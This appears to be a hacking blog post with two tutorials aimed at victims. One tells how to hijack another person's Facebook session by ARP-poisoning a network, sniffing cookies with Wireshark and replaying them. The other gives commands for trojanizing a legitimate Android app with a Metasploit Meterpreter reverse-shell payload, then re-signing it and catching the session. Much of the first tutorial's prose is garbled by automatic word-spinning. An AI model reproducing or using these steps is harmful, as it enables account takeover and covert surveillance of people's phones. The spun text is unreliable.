How Wireshark Can Be Used To Hack Any Facebook Account

hack facebook account password using cookie stealing

Hello viewers , nowadays most searched article on internet is hack facebook and there are many other websites that says just provide us username and password is ready!! they are just useless and i wanted to provide you genuine way to hack facebook

Hack Facebook Account by Wireshark

Before proceeding onward to this guide, in case you’re searching for more straightforward and solid working technique to hack Facebook, at that point do read my this instructional exercise on hacking Facebook!

Wireshark is the best free parcel sniffer programming accessible today. Really, it was produced for making a system secure. In any case, a similar programming is presently utilized by programmers to test for weakness and security escape clauses in the system and to assault the system likewise. Treat taking being one of the sorts of hacks executed utilizing this Wireshark programming.

Wireshark is the world’s head and by and large used framework tradition analyzer. It allows you to see what’s happening your framework at a little level and is the acknowledged (and every now and again by right) standard transversely finished various business and non-advantage endeavors, government workplaces, and enlightening foundations. Wireshark progression prospers due to the volunteer duties of frameworks organization experts around the globe and is the continuation of a wander started by Gerald Combs in 1998

To hack Facebook utilizing Wireshark you will require underneath things.


Cain and Abel

Firefox 3 (or one compitable with add n edit)
Add n Edit (cookie editor for Firefox) :

You should access to the system with client you need to hack Network Traffic.


Download and introduce every single above program. To “Include n Edit” to your program simply open firefox, go to apparatuses, at that point click additional items. you can move the program from wherever you spared it into the little box that flown up and introduce it from that point.

  • First: Gain access to the Network. Open systems or your own particular system would be simple yet in the event that you have a particular slave you need you ought to have the capacity to pick up acess utilizing Backtrack.


Utilize Reaver to misuse WPS for WPA/WPA2 encryptions, WEPs are anything but difficult to split given time and OPN implies there is no watchword.

  • Second: Right snap Cain and pick ‘keep running as manager.’ on the best bar go to “design” and make sure to choose your remote card/connector. presently click where it says “Sniffer” at that point this litte catch towards the upper left:

How To Hack Facebook Using Wireshark

Next snap any unfilled white box then the blue “+” image close to the catch you squeezed just some time recently. Pick approve

How To Hack Facebook Using Wireshark

These are every one of the gadgets it could identify.

Presently we go to APR on the base bar. At the end of the day click any unfilled white box then the blue cross. It’s most effortless to simply go one by one and pick all conceivable outcomes.

How To Hack Any Facebook Account Using Wireshark

Presently we need to harm them so we pick the little yellow danger image towards the upper left. Should now resemble this:

We are done here, simply limit Cain for the time being.

  • Third:Run Wireshark as overseer. On the best bar pick “Catch” at that point “Interfaces.” Here you should pick your interface that is associated with the Network we are sniffing from. on the off chance that you hold up a couple of moments you may see some movement being gathered as found in my photograph, simply pick that interface b/c that is in all probability it.

How To Hack Facebook Using Wireshark

Getting Wireshark

You can get it from its official website!!

Only a speedy cautioning: Many associations don’t permit Wireshark and comparable instruments on their systems. Try not to utilize this device at work unless you have consent.

Wireshark has a rich list of capabilities which incorporates the accompanying:

  1. Profound assessment of several conventions, with all the more being included constantly
  2. Live catch and disconnected examination
  3. Standard three-sheet bundle program
  4. Multi-stage: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and numerous others
  5. Caught organize information can be perused by means of a GUI, or by means of the TTY-mode TShark utility
  6. The most intense show channels in the business
  7. Rich VoIP investigation
  8. Catch records packed with gzip can be decompressed on the fly 
  9. Shading guidelines can be connected to the parcel list for fast, natural investigation
  10. Yield can be traded to XML, PostScript®, CSV, or plain content
  11. Unscrambling support for some conventions, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2
  12. A couple of catching procedures
  13. There are various diverse approaches to catch precisely what you are searching for in Wireshark, by applying catch channels or show channels.

A few capturing techniques

There are various diverse approaches to catch precisely what you are searching for in Wireshark, by applying catch channels or show channels.

Filtering TCP Packets
In the event that you need to see all the present TCP bundles, sort tcp into the “Channel” bar or in the CLI, enter:

$ tshark -f "tcp"

Filtering UDP packets
In the event that you need to see all the current UDP bundles, sort udp into the “Channel” bar or in the CLI, enter:

$ tshark -f "udp"

Filter packets to a specific IP Address

On the off chance that you might want to see all the activity setting off to a particular address, enter show channel ip.dst ==, supplanting with the IP address the active movement is being sent to.

On the off chance that you might want to see all the approaching activity for a particular address, enter show channel ip.src ==, supplanting with the IP address the approaching movement is being sent to.

In the event that you might want to see all the approaching and active movement for a particular address, enter show channel ip.addr ==, supplanting with the relevanColoring guidelines can be connected to the parcel list for brisk, instinctive examination

Yield can be traded to XML, PostScript®, CSV, or plain content

Decoding support for some conventions, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2

Move On!

Wireshark will rundown and shading code all the activity it sees for you. To make this more straightforward we can utilize the channel to just observe the movement we need, Type “http.cookie” in the channel. (Something to consider is to simply channel to “http” and look through the passages searching for ones that begin with “POST” this implies data was submitted to the website page noted, for example, a username and a secret word! so on the off chance that you see this simply look through the subtle elements and you should see the information you need, most passwords will be hashed yet utilize this site to decode them:

Here is a picture:

How To Hack Any Facebook Account Using Wireshark

You can either look through this data physically or utilize the hunt capacity to discover what you need. For my situation I need to seize the session of a client on the gathering so i will utilize the pursuit work (press Ctrl+F, or go to Edit – > Search) and sort in the data i know for beyond any doubt will be in the section. In the event that you’re commandeering somebody’s Facebook put “Facebook” there. More often than not to be protected i don’t utilize the primary section I see b/c this will just work if the individual is auto signed in, so simply go down a couple of additional until the point when you see one you think will work.

How To Hack Any Facebook Account Using Wireshark

What we require are the treats. Here are what mine look like and how to arrive. With training you will have the capacity to tell which treats are utilized for logins and have the capacity to restrain fizzled endeavors.

How To Hack Facebook Using Wireshark

Duplicate the treats as esteem and spare them into a scratch pad (appeared in pic above). I would recommend to isolate wherever you see a “;” this proposes is the start of the following passage. The content to one side of the = is the name of the treat and the content to the privilege is its esteem.


Open up your Firefox program with Add n Edit empowered. You can get to your additional items by going to instruments and they should all be recorded in the drop down tab. To begin with go to the site you are commandeering the session from that point open your treat manager. Should look something like this:

 How To Hack Any Facebook Account Using Wireshark

The exact opposite thing to do is to change your treats to coordinate the ones you caught. In the event that the treats given to you by the site terminate (like the ones in my photo do) you should erase them and include every one of the ones we caught before in. in the event that they don’t Expire you can simply alter them. Main concern is every one of the treats must match the treats you catches in the prior strides EXACTLY! Ensure you don’t include any additional items and that you didn’t miss anything. Additionally all fields must be filled in (Path and Domain and Name and Value). My way is “/” and my area is “”

How To Hack Facebook Using Wireshark

You are presently done, Just close the treat supervisor and reload the website page. On the off chance that done accurately with the right treats you ought to be signed in as the client you assaulted!

Congrats, you have hacked Facebook!

If you think this was hard, try easy method to hack Facebook using phishing.

Happy Hacking!!

Any Android Can Be Hacked Over The Internet Using Metasploit Part : 2


Hacking Android With Metasploit!

We’ve discussed how to create Metasploit payload and how to configure your Linux to NOIP account for DDNS in First Part of this series

In this second and the last part we’ll do Hooking up the metasploit node and embedding the payload inside the Android App. (Your favored apps like Facebook or Gmail or any games)

For that we require:

  • APKTOOL the android reverse engineering tool

You can install the apktool easily by typing this command on terminals (Apktool is came with the Kali-Linux OS)

sudo apt-get install apktool

  • Jarsigner for digitally sign the android Apps with fake certificates

Download necessary files for jarsigner from our GitHub repository

So now all we’ve to do is:

1. Generate the Meterpreter payload

2.Decompile the payload and the original apk

3.Copy the payload files to the original apk

4.Inject the hook into the appropriate activity of the original apk

5.Inject the permissions in the AndroidManifest.xml file

6.Re-compile the original apk

7.Sign the apk using Jarsigner

We’ve already done with generating Metasploit payload in last part.

So we’ll continue to

Second step

Decompiling the payload and you’re desired APK file which you want place your payload:

The apktool decompile command is as follows

apktool d -f -o payload /root/meterpreter.apk
apktool d -f -o original /root/original_app_name.apk

After compliment this process there will be 2 folders at the root one contains the files of msf payload and another one is of original apk which is to be binded by payload.

Third step

Coping the Files from Payload apk to original apk:

So open up the AndroidManifest.xml file located inside the “/root/original” folder using any text editor.

If you know HTML, then this file will look familiar to you. Both of them are essentially Markup Languages, and both use the familiar tags and attributes structure e.g. <tag attribute=”value”> Content </tag>. Anyway, look for an <activity> tag which contains both the lines –

<action android:name=”android.intent.action.MAIN”/>
<category android:name=”android.intent.category.LAUNCHER”/>

Step four

Inject the hook into the appropriate activity of the original apk

On a side note, you can use CTRL+F to search within the document in any GUI text editor. When you locate that activity, note its “android:name” attribute’s value

Those two lines we searched for signifies that this is the activity which is going to start when we launch the app from the launcher icon, and also this is a MAIN activity similar to the ‘main’ function in traditional programming.

Now that we have the name of the activity we want to inject the hook into, let’s get to it! First of all, open the .smali code of that activity using text editors. Just open a terminal and type –

gedit /root/original/smali/Activity_Path

Replace the Activity_Path with the activity’s “android:name“, but instead of the dots, type slash. Actually the smali codes are stored in folders named in the format the “android:name” is in, so we can easily get the location of the .smali code in the way we did.

Then search for the following line in the smali code using CTRL+F –


When you get that change the entire line to this

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

When the mainactivity executes this line what happens is the app executes the main activity of the app with the metasploit payload.

So we can get the meterpreter shell in our Console.

Step five

Inject the permissions in the AndroidManifest.xml file

Now we all are set but we must have to give necessary permissions or additional permission to get the full control over android device for that we’ve to edit the android manifest xml file
XML file looks as the HTML so it’s easy to manipulate the file.

Please copy this text and place it in specified area after <permission> tag with other but don’t make redundant lines:

<uses-permission android:name="android.permission.VIBRATE"/>
 <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/>
 <uses-permission android:name="android.permission.WAKE_LOCK"/>
 <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
 <uses-permission android:name=""/>
 <uses-permission android:name="android.permission.CAMERA"/>
 <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
 <uses-permission android:name="android.permission.PERSISTENT_ACTIVITY"/>
 <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/>
 <uses-permission android:name="android.permission.READ_LOGS"/>
 <uses-permission android:name="android.permission.DEVICE_POWER"/>
 <uses-permission android:name="android.permission.SET_WALLPAPER"/>
 <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
 <uses-permission android:name="android.permission.EXPAND_STATUS_BAR"/>
 <uses-permission android:name="android.permission.GET_TASKS"/>
 <uses-permission android:name="android.permission.DISABLE_KEYGUARD"/>
 <uses-permission android:name="android.permission.STATUS_BAR"/>
 <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
 <uses-permission android:name=""/>
 <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
 <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
 <uses-permission android:name="android.permission.INTERNET"/>
 <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
 <uses-permission android:name="android.permission.ACCESS_COURSE_LOCATION"/>
 <uses-permission android:name="android.permission.SEND_SMS"/>
 <uses-permission android:name="android.permission.RECEIVE_SMS"/>
 <uses-permission android:name="android.permission.RECORD_AUDIO"/>
 <uses-permission android:name="android.permission.CALL_PHONE"/>
 <uses-permission android:name="android.permission.READ_CONTACTS"/>
 <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
 <uses-permission android:name="android.permission.READ_SMS"/>
 <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
 <uses-permission android:name=""/>

Step six

Re-compile the original apk

After saving the XML file we’ve to go for re-compilation of file to get embedded with .apk file.

apktool b /root/original

Now the original apk file is ready!

Step seven

Sign the apk using Jarsigner

Android requires that all apps be digitally signed with a certificate before they can be installed. It (Android) uses this certificate to identify the author of an app, and the certificate does not need to be signed by a certificate authority. Android apps often use self-signed certificates. The app developer holds the certificate’s private key.

In this case we are going to sign the apk using the default android debug key. Just run the following command –

jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA apk_path androiddebugkey

The file keystore and all the necessary files there in the file please download this from the following links

Download Link1

Download Link2

Now if you can get the victim to install and run this very legit-looking app in his phone, you can get a working meterpreter session on his phone!

Just open your console command:

->use multi/handler
->set PAYLOAD android/meterpreter/reverse_tcp
->set LHOST
->set LPORT 4444

While specifying PAYLOAD Please check that what you’ve given while creating PAYLOAD
it should be same and to get the meterpreter session the port 4444 should be PORT FORWARDED from your router/modem.

To do this go to your gateway or home-page of router (Example:

There you’ll find the Virtual Server or Port Forwarding option just set all TCP port forwarding active.

If you use internet from android mobile hotspots please Download Port Forward Apps avilable on Playstore.

Profit from this Tool is

When the victim installs the app in his phone you’ll get meterpreter session opened and you can perform many operations on it like taking photo,recording voice check_root etc…

Just type help when you get meterpreter session there are several operations will be listed!

I hope this Metasploit series of hacking android phones is very helpful. 🙂

If you have any queries please write in comments section we’ll take care of it.

Thank you..!

Lanwil DS (Team HR)